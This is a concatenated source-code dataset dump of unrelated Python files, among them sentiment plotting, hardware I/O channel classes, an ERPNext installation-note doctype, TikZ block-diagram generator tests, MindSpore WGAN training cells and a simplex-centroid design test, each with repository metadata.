comment = comments_per_event_uncleaned[event][commend_id]
comment_emotion = NRCLex(comment)
for emotion in comment_emotion.affect_frequencies:
overall_scores[emotion] += comment_emotion.affect_frequencies[emotion]
#Sum positive and negative emotions
emotion_types = {
'positive': ['anticipation', 'trust', 'surprise', 'positive', 'joy'],
'negative': ['fear', 'anger', 'negative', 'sadness', 'disgust']
}
emotion_scores = {'positive': 0.0, 'negative': 0.0}
for emotion_type in emotion_types:
emotions = emotion_types[emotion_type]
for emotion in emotions:
emotion_scores[emotion_type] += overall_scores[emotion]
base = 100 / (emotion_scores['positive'] + emotion_scores['negative'])
positive_percent = base * emotion_scores['positive']
negative_percent = base * emotion_scores['negative']
topics_positive_scores.append(round(positive_percent))
topics_negative_scores.append(round(negative_percent))
sentiment_results[event] = [topic_labels, topics_positive_scores, topics_negative_scores]
# %% Plotting results of sentiment analysis
import matplotlib.pyplot as plt
import numpy as np
def autolabel(rects):
"""Attach a text label above each bar in *rects*, displaying its height."""
for rect in rects:
height = rect.get_height()
ax.annotate('{}'.format(height),
xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=(0, 3), # 3 points vertical offset
textcoords="offset points",
ha='center', va='bottom')
fig, axes = plt.subplots(2, 3, figsize=(17.5, 10.5), sharex=False, sharey=False)
fig.set_size_inches(17.5, 10.5)
fig.suptitle('Sentiment Distribution per Topic and Event')
handles, labels = (0,0)
for i, ax in enumerate(axes.flatten()):
event = list(sentiment_results.keys())[i]
x = np.arange(len(sentiment_results[event][0])) # the label locations
width = 0.35 # the width of the bars
rects1 = ax.bar(x - width/2, sentiment_results[event][1], width, label='Positive', color='g')
rects2 = ax.bar(x + width/2, sentiment_results[event][2], width, label='Negative', color='r')
# Add some text for labels, title and custom x-axis tick labels, etc.
ax.set_ylabel('Scores in %')
ax.set_xlabel('Topic')
ax.set_xticks(x)
ax.set_xticklabels(sentiment_results[event][0])
ax.set_title(event)
handles, labels = ax.get_legend_handles_labels()
autolabel(rects1)
autolabel(rects2)
fig.tight_layout()
fig.legend(handles=handles, loc='upper right')
plt.show()
#plt.savefig("topic_sentiments.pdf")
# %%
| 40.003953 | 463 | 0.668511 |
6cc07d4c91b8fd742b2edffeeecfd06f62dc0153
| 5,934 |
py
|
Python
|
src/data_science/data_science/in_out/channels.py
|
viclule/api_models_deployment_framework
|
7595cf0b4f3e277925b968014102d7561547bcd4
|
[
"MIT"
] | null | null | null |
src/data_science/data_science/in_out/channels.py
|
viclule/api_models_deployment_framework
|
7595cf0b4f3e277925b968014102d7561547bcd4
|
[
"MIT"
] | null | null | null |
src/data_science/data_science/in_out/channels.py
|
viclule/api_models_deployment_framework
|
7595cf0b4f3e277925b968014102d7561547bcd4
|
[
"MIT"
] | null | null | null |
from data_science.tools.threading_utilities import ThreadableClass
import data_science.tools.transformations as transf
from data_science.tools.classes import InstanceTraceable
from data_science.simulation.parameter import Parameter
class ChannelTypes():
"""Communication channel types."""
UNDEFINED = "undefined"
CURRENT = "current"
VOLTAGE = "voltage"
PT1000 = "pt1000"
DIGITAL = "digital"
@classmethod
def get_types(cls):
attrs = []
for k, v in cls.__dict__.items():
if isinstance(k, str) and isinstance(v, str) and k[0:2] != "__":
attrs.append(v)
return attrs
class Channel(InstanceTraceable):
def __init__(self, physical, minimum, maximum, physical_minimum,
physical_maximum, name, parameter_name=None,
channel_type=ChannelTypes.UNDEFINED,
units='no_units', db_model=None):
super().__init__()
self.name = None
if __class__.instance_exist(name):
raise KeyError('The name {} is already taken.'.format(name))
else:
self.name = name
self.physical = physical
self.minimum = float(minimum)
self.maximum = float(maximum)
self.physical_minimum = float(physical_minimum)
self.physical_maximum = float(physical_maximum)
self.parameter_name = parameter_name
self.channel_type = channel_type
self.units = units
self.db_model = db_model
if self.channel_type == ChannelTypes.DIGITAL:
self.value = False
else:
self.value = 0.0
def set_minimum(self, minimum):
self.minimum = float(minimum)
def set_maximum(self, maximum):
self.maximum = float(maximum)
def set_physical_minimum(self, physical_minimum):
self.physical_minimum = float(physical_minimum)
def set_physical_maximum(self, physical_maximum):
self.physical_maximum = float(physical_maximum)
@classmethod
def getinstances(cls):
instances = super().getinstances()
sub_inst = []
for inst in instances:
if isinstance(inst, __class__):
sub_inst.append(inst)
return sub_inst
@classmethod
def instance_exist(cls, name):
exist, inst = super().instance_exist(name)
if isinstance(inst, __class__) and exist:
return exist
else:
return False
@classmethod
def getinstance(cls, name):
inst = super().getinstance(name)
if isinstance(inst, __class__):
return inst
else:
return None
class InputChannel(Channel):
def read(self, raw=False):
temp_value = self.physical()
if (self.channel_type == ChannelTypes.VOLTAGE) or \
(self.channel_type == ChannelTypes.CURRENT):
if not raw:
self.minimum = float(self.minimum)
temp = transf.range_to_range_linear(temp_value,
self.physical_minimum,
self.physical_maximum,
self.minimum,
self.maximum)
else:
temp = temp_value
else:
temp = temp_value
self.value = temp
return temp
class OutputChannel(Channel):
def write(self, value, raw=False):
if self.db_model is not None:
channel = self.db_model.objects.filter(name=self.name,
live=True).first()
if (self.channel_type == ChannelTypes.VOLTAGE) or \
(self.channel_type == ChannelTypes.CURRENT):
if not raw:
temp = transf.range_to_range_linear(value,
self.minimum,
self.maximum,
self.physical_minimum,
self.physical_maximum)
else:
temp = value
temp = int(temp)
if self.db_model is not None:
channel.value_analog = temp
else:
temp = value
if self.db_model is not None:
channel.value_digital = temp
self.physical(temp)
self.value = temp
if self.db_model is not None:
channel.save()
def read(self):
if self.db_model is not None:
channel = self.db_model.objects.filter(name=self.name,
live=True).first()
if (self.channel_type == ChannelTypes.VOLTAGE) or \
(self.channel_type == ChannelTypes.CURRENT):
return channel.value_analog
elif self.channel_type == ChannelTypes.DIGITAL:
return channel.value_digital
else:
raise NotImplementedError('This type of channel is not \
implemented yet.')
else:
return self.value
class ChannelsUpdater(ThreadableClass):
"""A class to update all physical channels in an StoppableThread."""
def update_channels(self):
instances = Channel.getinstances()
for instance in instances:
if instance.parameter_name is not None:
parameter = Parameter.getinstance(instance.parameter_name)
if isinstance(instance, InputChannel):
value = instance.read()
parameter.update_value(value)
if isinstance(instance, OutputChannel):
instance.write(parameter.value)
def do_something(self):
while True:
self.update_channels()
| 34.300578 | 76 | 0.551904 |
9f730f4878c14150dfaac600c74ccb7f12c56d91
| 3,342 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/selling/doctype/installation_note/installation_note.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/selling/doctype/installation_note/installation_note.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/selling/doctype/installation_note/installation_note.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import cstr, getdate
from frappe import _
from erpnext.stock.utils import get_valid_serial_nos
from erpnext.utilities.transaction_base import TransactionBase
class InstallationNote(TransactionBase):
def __init__(self, *args, **kwargs):
super(InstallationNote, self).__init__(*args, **kwargs)
self.status_updater = [{
'source_dt': 'Installation Note Item',
'target_dt': 'Delivery Note Item',
'target_field': 'installed_qty',
'target_ref_field': 'qty',
'join_field': 'prevdoc_detail_docname',
'target_parent_dt': 'Delivery Note',
'target_parent_field': 'per_installed',
'source_field': 'qty',
'percent_join_field': 'prevdoc_docname',
'status_field': 'installation_status',
'keyword': 'Installed',
'overflow_type': 'installation'
}]
def validate(self):
self.validate_installation_date()
self.check_item_table()
from erpnext.controllers.selling_controller import check_active_sales_items
check_active_sales_items(self)
def is_serial_no_added(self, item_code, serial_no):
has_serial_no = frappe.db.get_value("Item", item_code, "has_serial_no")
if has_serial_no == 1 and not serial_no:
frappe.throw(_("Serial No is mandatory for Item {0}").format(item_code))
elif has_serial_no != 1 and cstr(serial_no).strip():
frappe.throw(_("Item {0} is not a serialized Item").format(item_code))
def is_serial_no_exist(self, item_code, serial_no):
for x in serial_no:
if not frappe.db.exists("Serial No", x):
frappe.throw(_("Serial No {0} does not exist").format(x))
def get_prevdoc_serial_no(self, prevdoc_detail_docname):
serial_nos = frappe.db.get_value("Delivery Note Item",
prevdoc_detail_docname, "serial_no")
return get_valid_serial_nos(serial_nos)
def is_serial_no_match(self, cur_s_no, prevdoc_s_no, prevdoc_docname):
for sr in cur_s_no:
if sr not in prevdoc_s_no:
frappe.throw(_("Serial No {0} does not belong to Delivery Note {1}").format(sr, prevdoc_docname))
def validate_serial_no(self):
prevdoc_s_no, sr_list = [], []
for d in self.get('items'):
self.is_serial_no_added(d.item_code, d.serial_no)
if d.serial_no:
sr_list = get_valid_serial_nos(d.serial_no, d.qty, d.item_code)
self.is_serial_no_exist(d.item_code, sr_list)
prevdoc_s_no = self.get_prevdoc_serial_no(d.prevdoc_detail_docname)
if prevdoc_s_no:
self.is_serial_no_match(sr_list, prevdoc_s_no, d.prevdoc_docname)
def validate_installation_date(self):
for d in self.get('items'):
if d.prevdoc_docname:
d_date = frappe.db.get_value("Delivery Note", d.prevdoc_docname, "posting_date")
if d_date > getdate(self.inst_date):
frappe.throw(_("Installation date cannot be before delivery date for Item {0}").format(d.item_code))
def check_item_table(self):
if not(self.get('items')):
frappe.throw(_("Please pull items from Delivery Note"))
def on_update(self):
frappe.db.set(self, 'status', 'Draft')
def on_submit(self):
self.validate_serial_no()
self.update_prevdoc_status()
frappe.db.set(self, 'status', 'Submitted')
def on_cancel(self):
self.update_prevdoc_status()
frappe.db.set(self, 'status', 'Cancelled')
| 34.8125 | 105 | 0.744165 |
4ccdb1b95f5cdab0bdabb6bcee0e214064200f13
| 355 |
py
|
Python
|
src/bo4e/enum/verbrauchsart.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | 1 |
2022-03-02T12:49:44.000Z
|
2022-03-02T12:49:44.000Z
|
src/bo4e/enum/verbrauchsart.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | 21 |
2022-02-04T07:38:46.000Z
|
2022-03-28T14:01:53.000Z
|
src/bo4e/enum/verbrauchsart.py
|
bo4e/BO4E-python
|
28b12f853c8a496d14b133759b7aa2d6661f79a0
|
[
"MIT"
] | null | null | null |
# pylint:disable=missing-module-docstring
from bo4e.enum.strenum import StrEnum
class Verbrauchsart(StrEnum):
"""
Verbrauchsart einer Marktlokation.
"""
KL = "KL" #: Kraft/Licht
KLW = "KLW" #: Kraft/Licht/Wärme
KLWS = "KLWS" #: Kraft/Licht/Wärme/Speicherheizung
W = "W" #: Wärme
WS = "WS" #: Wärme/Speicherheizung
| 22.1875 | 55 | 0.639437 |
4cd24913c08e2cd1841af830403a1453a9f81a09
| 13,454 |
py
|
Python
|
blockschaltbilder/tests/bsb_test.py
|
mp4096/blockschaltbilder
|
9253022b5518e42d784176594d4d6fee7baa1050
|
[
"MIT"
] | 11 |
2016-08-19T18:11:19.000Z
|
2020-07-27T07:04:52.000Z
|
blockschaltbilder/tests/bsb_test.py
|
mp4096/blockschaltbilder
|
9253022b5518e42d784176594d4d6fee7baa1050
|
[
"MIT"
] | 8 |
2016-09-17T16:46:01.000Z
|
2021-04-29T19:59:57.000Z
|
blockschaltbilder/tests/bsb_test.py
|
mp4096/blockschaltbilder
|
9253022b5518e42d784176594d4d6fee7baa1050
|
[
"MIT"
] | 4 |
2016-09-21T18:45:09.000Z
|
2020-07-27T07:08:17.000Z
|
"""Test suit for the Blockschaltbild boilerplate generator."""
import unittest
from ..bsb import Blockschaltbild, BlockschaltbildCoordinate, Block
class TestBlock(unittest.TestCase):
def test_no_pars(self):
"""Test if a block is initialised correctly if no parameters are specified."""
x, y = 3.14, 2.72
b = Block("Spam", "eggs", (x, y), "1 cm")
self.assertEqual(len(b.pars), 0)
def test_some_pars(self):
"""Test if a block is initialised correctly if some parameters are specified."""
x, y = 3.14, 2.72
b = Block("Spam", "eggs", (x, y), "1 cm", ["par1", "par2"])
self.assertEqual(b.pars, ["par1", "par2"])
def test_auto_coord(self):
"""Test auto TikZ coordinate specification for a block."""
x, y = 3.14, 2.72
b = Block("Spam", "eggs", (x, y), "1 cm")
self.assertEqual(b.get_tikz_coordinate("g"),
r"\coordinate (eggs--coord) at (3.14, 2.72);")
def test_latex_def_no_pars(self):
"""Test LaTeX block definition if there are no parameters."""
x, y = 3.14, 2.72
b = Block("Spam", "eggs", (x, y), "1 cm")
self.assertEqual(b.get_latex_definition(),
r"\Spam{eggs}{eggs--coord}{1 cm}")
def test_latex_def_some_pars(self):
"""Test LaTeX block definition if there are some parameters."""
x, y = 3.14, 2.72
b = Block("Spam", "eggs", (x, y), "1 cm", ["par1", "par2"])
self.assertEqual(b.get_latex_definition(),
r"\Spam{eggs}{eggs--coord}{1 cm}{par1}{par2}")
class TestBlockschaltbildCoordinate(unittest.TestCase):
def test_auto_coord(self):
"""Test TikZ coordinate specification."""
x, y = 3.14, 2.72
c = BlockschaltbildCoordinate("eggs", (x, y))
self.assertEqual(c.get_tikz_coordinate("g"),
r"\coordinate (eggs) at (3.14, 2.72);")
def test_latex_def(self):
"""Test LaTeX definition -- must return None."""
x, y = 3.14, 2.72
c = BlockschaltbildCoordinate("eggs", (x, y))
self.assertIsNone(c.get_latex_definition())
class TestBlockschaltbildBasics(unittest.TestCase):
def test_add_block(self):
"""Test block addition."""
bsb = Blockschaltbild()
bsb.add_block("PGlied", "block 1", (0, 0))
bsb.add_block("IGlied", "block 2", (1, 0))
self.assertEqual(bsb.num_blocks, 2)
self.assertEqual(bsb.get_block("block 1").xy, (0, 0))
self.assertEqual(bsb.get_block("block 2").xy, (1, 0))
def test_delete_existing_block(self):
"""Test deletion of an existing block."""
bsb = Blockschaltbild()
bsb.add_block("PGlied", "block 1", (0, 0))
bsb.add_block("IGlied", "block 2", (1, 0))
self.assertEqual(bsb.num_blocks, 2)
bsb.delete_block("block 1")
self.assertRaises(ValueError, bsb.get_block, "block 1")
self.assertEqual(bsb.num_blocks, 1)
bsb.delete_block("block 2")
self.assertRaises(ValueError, bsb.get_block, "block 2")
self.assertEqual(bsb.num_blocks, 0)
def test_delete_nonexisting_block(self):
"""Test deletion of an non-existing block -- must raise exception."""
bsb = Blockschaltbild()
self.assertRaises(ValueError, bsb.delete_block, "spam")
def test_rename_block(self):
"""Test renaming of an existing block."""
bsb = Blockschaltbild()
bsb.add_block("PGlied", "block 1", (0, 0))
bsb.add_block("IGlied", "block 2", (1, 0))
# "block 3" does not exist
self.assertRaises(ValueError,
bsb.rename_block, "block 3", "spam")
# "block 2" already exists
self.assertRaises(ValueError,
bsb.rename_block, "block 1", "block 2")
bsb.rename_block("block 1", "block A")
self.assertRaises(ValueError, bsb.get_block, "block 1")
self.assertEqual(bsb.num_blocks, 2)
self.assertEqual(bsb.get_block("block A").xy, (0, 0))
def test_add_connection(self):
"""Test addition of a connection."""
bsb = Blockschaltbild()
bsb.add_block("PGlied", "block 1", (0, 0))
bsb.add_block("IGlied", "block 2", (1, 0))
bsb.add_connection("block 1", "block 2")
self.assertRaises(ValueError,
bsb.add_connection, "block A", "block 1")
def test_delete_connection(self):
"""Test deletion of a connection."""
bsb = Blockschaltbild()
bsb.add_block("PGlied", "block 1", (0, 0))
bsb.add_block("IGlied", "block 2", (1, 0))
bsb.add_connection("block 1", "block 2")
bsb.delete_connection("block 1", "block 2")
self.assertRaises(ValueError,
bsb.delete_connection, "block 1", "block 2")
def test_add_existing_connection(self):
"""Test addition of an already existing connection -- must raise exception."""
bsb = Blockschaltbild()
bsb.add_block("PGlied", "block 1", (0, 0))
bsb.add_block("IGlied", "block 2", (1, 0))
bsb.add_connection("block 1", "block 2")
self.assertRaises(ValueError,
bsb.add_connection, "block 1", "block 2")
def test_auto_joints(self):
"""Test auto joints placement."""
bsb = Blockschaltbild()
bsb.add_block("PGlied", "block 1", (0, 0))
bsb.add_block("IGlied", "block 2", (1, 0))
bsb.add_block("IGlied", "block 3", (1, 1))
bsb.add_connection("block 1", "block 2")
bsb.add_connection("block 1", "block 3")
bsb.add_auto_joints()
self.assertEqual(bsb.num_blocks, 4)
self.assertEqual(bsb.get_block("ajnt1").block_type, "Verzweigung")
def test_auto_joints_vector_no_auto_joint(self):
"""Auto joints placement should not be triggered by a single vector connection."""
bsb = Blockschaltbild()
bsb.add_block("PGlied", "block 1", (0, 0))
bsb.add_block("IGlied", "block 2", (1, 0))
bsb.add_connection("block 1", "block 2", is_vector=True)
bsb.add_auto_joints()
self.assertEqual(bsb.num_blocks, 2)
def test_auto_joints_vector(self):
"""Auto joints placement should work for multiple vector connections."""
bsb = Blockschaltbild()
bsb.add_block("PGlied", "block 1", (0, 0))
bsb.add_block("IGlied", "block 2", (1, 0))
bsb.add_block("IGlied", "block 3", (1, 1))
bsb.add_connection("block 1", "block 2", is_vector=True)
bsb.add_connection("block 1", "block 3", is_vector=True)
bsb.add_auto_joints()
self.assertEqual(bsb.num_blocks, 4)
self.assertEqual(bsb.get_block("ajnt1").block_type, "Verzweigung")
def test_auto_joints_empty_bsb(self):
"""Test auto joints placement if no blocks are present."""
bsb = Blockschaltbild()
# Must run without exceptions
bsb.add_auto_joints()
self.assertEqual(bsb.num_blocks, 0)
def test_import_sketch(self):
"""Test import of a sketch."""
bsb = Blockschaltbild()
sketch = """
I1 P1
PTE1 PTZ1
D31415
"""
bsb.import_sketch(sketch.splitlines())
self.assertEqual(bsb.num_blocks, 5)
self.assertEqual(bsb.get_block("I1").block_type, "IGlied")
self.assertEqual(bsb.get_block("P1").block_type, "PGlied")
self.assertEqual(bsb.get_block("PTE1").block_type, "PTEinsGlied")
self.assertEqual(bsb.get_block("PTZ1").block_type, "PTZweiGlied")
self.assertEqual(bsb.get_block("D31415").block_type, "DGlied")
def test_import_invalid_sketch_duplications(self):
"""Test import of a sketch with duplicates -- must raise exception."""
bsb = Blockschaltbild()
sketch = ["I1 I1",]
self.assertRaises(ValueError, bsb.import_sketch, sketch)
def test_import_invalid_sketch_empty(self):
"""Test import of an empty sketch -- must return silently."""
bsb = Blockschaltbild()
sketch = [" ", " ", "\t", ]
bsb.import_sketch(sketch)
self.assertEqual(bsb.num_blocks, 0)
def test_import_names(self):
"""Test import of names."""
bsb = Blockschaltbild()
sketch = ["P1 I1", "D1 C1"]
bsb.import_sketch(sketch)
names = ["P1: spam", "I1 : eggs"]
bsb.import_names(names)
self.assertEqual(bsb.num_blocks, 4)
self.assertEqual(bsb.get_block("spam").block_type, "PGlied")
self.assertEqual(bsb.get_block("eggs").block_type, "IGlied")
def test_import_invalid_names(self):
"""Test import of a invalid names -- must raise exception."""
bsb = Blockschaltbild()
names = ["P1: spam", "I1: eggs"]
self.assertRaises(ValueError, bsb.import_names, names)
def test_import_connections(self):
"""Test import of connections."""
bsb = Blockschaltbild()
sketch = ["P1 I1", "D1 C1"]
bsb.import_sketch(sketch)
conns = ["P1 - I1", "I1 - D1", "D1 = C1"]
bsb.import_connections(conns)
self.assertRaises(ValueError,
bsb.add_connection, "P1", "I1")
self.assertRaises(ValueError,
bsb.add_connection, "I1", "D1")
self.assertRaises(ValueError,
bsb.add_connection, "D1", "C1")
def test_import_invalid_connections(self):
"""Test import of an invalid connections -- must raise exception."""
bsb = Blockschaltbild()
conns = ["P1 - I1",]
self.assertRaises(ValueError, bsb.import_connections, conns)
def test_export_to_text(self):
"""High-level (real use) case test of text export."""
block_sizes = {
"coordinate": None,
"Summationsstelle": "0.4 cm",
"Verzweigung": "2 pt",
"PGlied": "1 cm",
"IGlied": "1 cm",
"DGlied": "1 cm",
"PTEinsGlied": "1 cm",
"PTZweiGlied": "1 cm",
"TZGlied": "1 cm",
"UeFunk": "1 cm",
"MGlied": "1 cm",
"KLGlied": "1 cm",
"Saettigung": "1 cm",
}
bsb = Blockschaltbild(x_scale=0.5, y_scale=1.5,
block_sizes=block_sizes,
scalar_style="thick", vector_style="very thick",
arrow_style="-latex")
sketch = [
" C1 S1 S2 I1 I2 C2 ",
" P1 ",
" P2 ",
" ",
]
conns = [
"C1 - S1",
"S1 - S2",
"S2 - I1",
"I1 - I2",
"I1 - P1",
"I2 - C2",
"I2 - P2",
"P1 - S2",
"P2 - S1",
]
names = [
"C1: eingang",
"C2: ausgang",
"S1: sum 1",
"S2: sum 2",
"I1: int 1",
"I2: int 2",
"P1: p 1",
"P2: p 2",
]
bsb.import_sketch(sketch)
bsb.import_connections(conns)
bsb.import_names(names)
bsb.add_auto_joints()
expected_result = "\n".join([
r"\begin{tikzpicture}",
r"",
r"",
r"% <coordinates>",
r"\coordinate (eingang) at (2, 3);",
r"\coordinate (sum 1--coord) at (4, 3);",
r"\coordinate (sum 2--coord) at (6, 3);",
r"\coordinate (p 2--coord) at (8, 0);",
r"\coordinate (p 1--coord) at (8, 1.5);",
r"\coordinate (int 1--coord) at (8, 3);",
r"\coordinate (ajnt1--coord) at (9.6, 3);",
r"\coordinate (int 2--coord) at (10, 3);",
r"\coordinate (ausgang) at (12, 3);",
r"\coordinate (ajnt2--coord) at (12, 3);",
r"% </coordinates>",
r"",
r"",
r"% <blocks>",
r"\Summationsstelle{sum 1}{sum 1--coord}{0.4 cm}",
r"\Summationsstelle{sum 2}{sum 2--coord}{0.4 cm}",
r"\PGlied{p 2}{p 2--coord}{1 cm}{}",
r"\PGlied{p 1}{p 1--coord}{1 cm}{}",
r"\IGlied{int 1}{int 1--coord}{1 cm}{}",
r"\Verzweigung{ajnt1}{ajnt1--coord}{2 pt}",
r"\IGlied{int 2}{int 2--coord}{1 cm}{}",
r"\Verzweigung{ajnt2}{ajnt2--coord}{2 pt}",
r"% </blocks>",
r"",
r"",
r"% <connections>",
r"\draw[thick, -latex] (eingang) -- (sum 1);",
r"\draw[thick, -latex] (sum 1) -- (sum 2);",
r"\draw[thick, -latex] (sum 2) -- (int 1);",
r"\draw[thick, -latex] (p 2) -- (sum 1);",
r"\draw[thick, -latex] (p 1) -- (sum 2);",
r"\draw[thick] (int 1) -- (ajnt1);",
r"\draw[thick, -latex] (ajnt1) -- (p 1);",
r"\draw[thick, -latex] (ajnt1) -- (int 2);",
r"\draw[thick] (int 2) -- (ajnt2);",
r"\draw[thick, -latex] (ajnt2) -- (p 2);",
r"\draw[thick, -latex] (ajnt2) -- (ausgang);",
r"% </connections>",
r"",
r"",
r"\end{tikzpicture}",
r"",
])
self.assertEqual(bsb.export_to_text(), expected_result)
| 38.884393 | 90 | 0.535677 |
2cc78f46fcdda1bdaff840ecea0d19722cb2edab
| 6,122 |
py
|
Python
|
research/cv/wgan/src/cell.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/cv/wgan/src/cell.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/cv/wgan/src/cell.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
""" Train one step """
import mindspore.nn as nn
import mindspore.ops.composite as C
import mindspore.ops.operations as P
import mindspore.ops.functional as F
from mindspore.parallel._utils import (_get_device_num, _get_gradients_mean,
_get_parallel_mode)
from mindspore.context import ParallelMode
from mindspore.nn.wrap.grad_reducer import DistributedGradReducer
class GenWithLossCell(nn.Cell):
"""Generator with loss(wrapped)"""
def __init__(self, netG, netD):
super(GenWithLossCell, self).__init__()
self.netG = netG
self.netD = netD
def construct(self, noise):
"""construct"""
fake = self.netG(noise)
errG = self.netD(fake)
loss_G = errG
return loss_G
class DisWithLossCell(nn.Cell):
""" Discriminator with loss(wrapped) """
def __init__(self, netG, netD):
super(DisWithLossCell, self).__init__()
self.netG = netG
self.netD = netD
def construct(self, real, noise):
"""construct"""
errD_real = self.netD(real)
fake = self.netG(noise)
errD_fake = self.netD(fake)
loss_D = errD_real - errD_fake
return loss_D
class ClipParameter(nn.Cell):
""" Clip the parameter """
def __init__(self):
super(ClipParameter, self).__init__()
self.cast = P.Cast()
self.dtype = P.DType()
def construct(self, params, clip_lower, clip_upper):
"""construct"""
new_params = ()
for param in params:
dt = self.dtype(param)
t = C.clip_by_value(param, self.cast(F.tuple_to_array((clip_lower,)), dt),
self.cast(F.tuple_to_array((clip_upper,)), dt))
new_params = new_params + (t,)
return new_params
class GenTrainOneStepCell(nn.Cell):
""" Generator TrainOneStepCell """
def __init__(self, netG, netD,
optimizerG: nn.Optimizer,
sens=1.0):
super(GenTrainOneStepCell, self).__init__()
self.netD = netD
self.netD.set_train(False)
self.netD.set_grad(False)
self.weights_G = optimizerG.parameters
self.optimizerG = optimizerG
self.net = GenWithLossCell(netG, netD)
self.net.set_train()
self.net.set_grad()
self.grad = C.GradOperation(get_by_list=True, sens_param=True)
self.sens = sens
# parallel process
self.reducer_flag = False
self.grad_reducer_G = F.identity
self.parallel_mode = _get_parallel_mode()
if self.parallel_mode in (ParallelMode.DATA_PARALLEL, ParallelMode.HYBRID_PARALLEL):
self.reducer_flag = True
if self.reducer_flag:
mean = _get_gradients_mean()
degree = _get_device_num()
self.grad_reducer_G = DistributedGradReducer(self.weights_G, mean, degree) # A distributed optimizer.
def construct(self, noise):
""" construct """
loss_G = self.net(noise)
sens = P.Fill()(P.DType()(loss_G), P.Shape()(loss_G), self.sens)
grads = self.grad(self.net, self.weights_G)(noise, sens)
if self.reducer_flag:
grads = self.grad_reducer_G(grads)
return F.depend(loss_G, self.optimizerG(grads))
_my_adam_opt = C.MultitypeFuncGraph("_my_adam_opt")
@_my_adam_opt.register("Tensor", "Tensor")
def _update_run_op(param, param_clipped):
param_clipped = F.depend(param_clipped, F.assign(param, param_clipped))
return param_clipped
class DisTrainOneStepCell(nn.Cell):
""" Discriminator TrainOneStepCell """
def __init__(self, netG, netD,
optimizerD: nn.Optimizer,
clip_lower=-0.01, clip_upper=0.01, sens=1.0):
super(DisTrainOneStepCell, self).__init__()
self.weights_D = optimizerD.parameters
self.clip_parameters = ClipParameter()
self.optimizerD = optimizerD
self.net = DisWithLossCell(netG, netD)
self.net.set_train()
self.net.set_grad()
self.reduce_flag = False
self.op_cast = P.Cast()
self.hyper_map = C.HyperMap()
self.grad = C.GradOperation(get_by_list=True, sens_param=True)
self.sens = sens
self.clip_lower = clip_lower
self.clip_upper = clip_upper
# parallel process
self.reducer_flag = False
self.grad_reducer_D = F.identity
self.parallel_mode = _get_parallel_mode()
if self.parallel_mode in (ParallelMode.DATA_PARALLEL, ParallelMode.HYBRID_PARALLEL):
self.reducer_flag = True
if self.reducer_flag:
mean = _get_gradients_mean()
degree = _get_device_num()
self.grad_reducer_D = DistributedGradReducer(self.weights_D, mean, degree) # A distributed optimizer.
def construct(self, real, noise):
""" construct """
loss_D = self.net(real, noise)
sens = P.Fill()(P.DType()(loss_D), P.Shape()(loss_D), self.sens)
grads = self.grad(self.net, self.weights_D)(real, noise, sens)
if self.reducer_flag:
grads = self.grad_reducer_D(grads)
upd = self.optimizerD(grads)
weights_D_cliped = self.clip_parameters(self.weights_D, self.clip_lower, self.clip_upper)
res = self.hyper_map(F.partial(_my_adam_opt), self.weights_D, weights_D_cliped)
res = F.depend(upd, res)
return F.depend(loss_D, res)
| 35.80117 | 114 | 0.63721 |
390b912d0628075627beb3e29bdb15a6c98e1460
| 923 |
py
|
Python
|
.venv/Lib/site-packages/dexpy/tests/test_simplex_centroid.py
|
AI-Assistant/FEMAG-Python
|
ff86e8f41485ae9df6034e6b8e810b59f8094c70
|
[
"MIT"
] | 21 |
2016-10-19T18:13:03.000Z
|
2021-11-02T13:58:31.000Z
|
.venv/Lib/site-packages/dexpy/tests/test_simplex_centroid.py
|
AI-Assistant/FEMAG-Python
|
ff86e8f41485ae9df6034e6b8e810b59f8094c70
|
[
"MIT"
] | 43 |
2016-10-11T20:56:28.000Z
|
2020-08-20T16:39:38.000Z
|
.venv/Lib/site-packages/dexpy/tests/test_simplex_centroid.py
|
AI-Assistant/FEMAG-Python
|
ff86e8f41485ae9df6034e6b8e810b59f8094c70
|
[
"MIT"
] | 6 |
2017-12-22T03:47:37.000Z
|
2021-03-13T03:45:26.000Z
|
from unittest import TestCase
from dexpy.simplex_centroid import build_simplex_centroid
from dexpy.eval import det_xtxi
from dexpy.model import make_quadratic_model
import numpy as np
import patsy
class TestSimplexCentroid(TestCase):
@classmethod
def test_d_optimality(cls):
answer_d = [ 2.513455e3, 2.197654e6, 5.52777e9,
1.85905e13, 3.447727e16, 1.275709e19 ]
actual_d = []
for i in range(3, 9):
design = build_simplex_centroid(i)
model = "-1 + " + make_quadratic_model(design.columns,
include_squared=False)
x_matrix = patsy.dmatrix(model,
design,
return_type="dataframe")
actual_d.append(det_xtxi(x_matrix, use_log=False))
np.testing.assert_allclose(answer_d, actual_d, rtol=1e-5)
